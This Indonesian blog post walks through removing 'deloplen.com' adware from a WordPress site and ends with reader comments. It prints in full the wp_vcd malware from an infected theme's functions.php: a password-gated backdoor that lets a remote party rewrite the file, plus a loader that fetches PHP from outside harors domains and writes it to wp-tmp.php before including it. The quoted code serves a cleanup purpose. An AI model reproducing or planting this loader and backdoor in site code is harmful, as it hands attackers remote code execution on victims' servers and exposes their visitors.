Assalamualaikum wr. wb. teman-teman blogger semua. Apa kabarnya kalian hari ini? Saya doakan semoga sehat selalu. Pada kesempatan kali ini saya akan membagikan pengalaman saya mengenai cara membersihkan virus deloplen.com di WordPress 100% berhasil. Kenapa saya tulis judul begitu? Karena ini memang sebuah keberhasilan saya membersihkan virus tersebut.
Dulu saya berpikir iklan deloplen ini adalah iklan web browser, karena setiap kali membuka blog saya melalui hasil pencarian google dan mengkliknya pada area kosong maka iklan deloplen akan membuka tab baru. Maka dari itu saya abaikan saja, hingga selang 2 tahunan saya mulai menyadari bahwa iklan ini bukan berasal dari web browser.
Pasalnya setiap postingan dari hasil pencarian google pasti iklan deloplen ini akan muncul, tetapi ketika saya buka langsung url blog saya iklan deloplen ini tidak akan tampil. Maka dari situ saya menyimpulkan bahwa iklan deloplen ini adalah Malware/ AdWare yang menjangkiti blog WordPress saya.
Saya berpikir jika ini terjadi secara terus menerus, virus malware ini akan membawa dampak negatif pada blog saya. Jika iklan tersebut selalu muncul pada blog saya, secara otomatis akan menghilangkan pengunjung blog saya. Kemudian iklan Adsense saya juga lama kelamaan akan dibanned karena tidak mematuhi kebijakan.
Apa Itu Deloplen?
Perlu kita ketahui bahwa Deloplen.com ini adalah sebuah domain yang berbahaya yang mungkin terkait dengan adware. Iklan yang didukung deloplen ini umumnya akan diinstal bersama dengan shareware, atau program-program gratis, dan plugin/ theme nulled yang biasa dipakai pada CMS khususnya WordPress.
Pada awalnya deloplen ini merupakan bagian dari layanan iklan yang digunakan penerbit situs web yang memungkinkan pemilik situs memperoleh pendapatan dari pengalihan blog.
Sayangnya, ada beberapa pihak yang tidak bertanggungjawab mempunyai program adware dan menyuntikan iklan ini di situs web yang dikunjungi tanpa izin dari penerbit untuk menghasilkan pendapatan.
Secara umum, ada beberapa penyebab utama adware deloplen.com ini bisa menjangkiti, antara lain:
- Terdapatnya AdWare [Iklan jahat] di dalam situs atau aplikasi yang pernah anda kunjungi, unduh dan buka.
- Menggunakan script yang sudah ditanamkan jenis iklan adware ini.
- Afiliasi dengan pengiklan yang memasukan kode iklan seperti ini sehingga pengalihan akan dilakukan secara terus menerus
Kemungkinan lain [belum diketahui dengan pasti] misalnya riwayat browser dan juga aplikasi yang terinstal di smartphone atau komputer yang anda gunakan. - Tema atau template yang anda gunakan tertanam script iklan adware termasuk juga ekstensi Chrome, plugin serta antivirus lain seperti Seguro.
- Dan masih banyak metode lainnya.
Untuk pembahasan kali ini saya akan membagikan kepada teman-teman blogger bagaimana cara menghilangkan virus deloplen tersebut di WordPress. Ini hasil pengalaman ya teman-teman, jadi sudah terbukti berhasil. Mari kita ke tahap-tahapnya berikut ini.
Cara Membersihkan Virus Deloplen.com di WordPress
#Langkah Pertama
- Silahkan teman-teman login di CPanel Hosting kalian masing-masing.
- Masuk ke File Manager > cari root blog file wordpress teman-teman.
- Buka public_html > wp-content > themes > nama-theme-anda > functions.php, gandakan dulu filenya sebelum di edit sebagai backup jikalau terjadi error.
- Hapus semua kode tambahan yang dimasukkan malware, biasanya ada di atas kode default. Anda dapat mencari kata-kata “wp_vcd” dan “wp-tmp” untuk menemukan kodenya.
- Sebagai contoh saya menggunakan NewsMag Theme, maka kode yang tampil akan seperti ini, silahkan cari saja kode yang mirip seperti dibawah.
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2c521558b433a4de424ca51267ec7464')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) {case 'change_domain'; if (isset($_REQUEST['newdomain'])) {if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) {$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='3141695589e0e8d9d18fb3d75b5cf774'; if (($tmpcontent = @file_get_contents("http://www.harors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.harors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.harors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.harors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?>
- Perlu diperhatikan, dalam menghapus kode, mulai hapus dari kode <? php sampai ?>. Karena kode “wp_vcd” dan “wp-tmp” berada di dalam fungsi php. Hapuslah semua kode tersebut.
- Save Filenya.
#Langkah Kedua
- Masih di file manager, masuk ke public_html > wp-includes.
- Sebelum menghapus, cadangkan ketiga file dibawah.
- Hapus file “wp-feed.php“, “wp-vcd.php” dan “wp-tmp.php“.
- Silahkan buka halaman blog anda, dan cobalah dengan mengklik sembarang link.
- Dan selamat, iklan deloplen.com tidak akan tampil lagi.
Kesimpulan
Sebagai orang yang awam dan tidak mengetahui seluk beluk tentang dunia pemrograman, sepatutnya kita harus berhati-hati dan bijak dalam menggunakan Internet. Dari hasil kesimpulan saya, virus deloplen ini akan menjangkiti komputer, ponsel, software maupun blog kita jika kita secara sembarangan mengunduh program yang tidak kita kenal di Internet. Entah itu iklan, afiliasi, program, plugin, situs web tidak dikenal, dan lain sebagainya.
Maka ini semua terjadi sebetulnya karena kesalahan kita sendiri. Oleh karena itu, kita wajib mengantisipasi semua itu dengan menginstal AntiVirus, AntiMalware, atau tidak menginstal dan menggunakan program-program yang disebar di Internet secara bebas. Bijaklah dalam memakai!
Terima kasih telah meluangkan waktu membaca artikel ini mengenai Cara Membersihkan Virus Deloplen.com di WordPress 100% Berhasil, semoga bermasalahan yang dihadapi dapat segera teratasi. Jangan lupa share artikel ini dan berlangganan artikel pada blog ini, terima kasih. Salam WordPress!
Sangat bermanfaat sekali infonya mas. Saya akan praktekan semoga berhasil. Terima kasih. Sukses selalu.
semoga berhasil gan,, goodluck
Bismillah gan, semoga berhasil di theme lain…
mudah-mudahan gan,,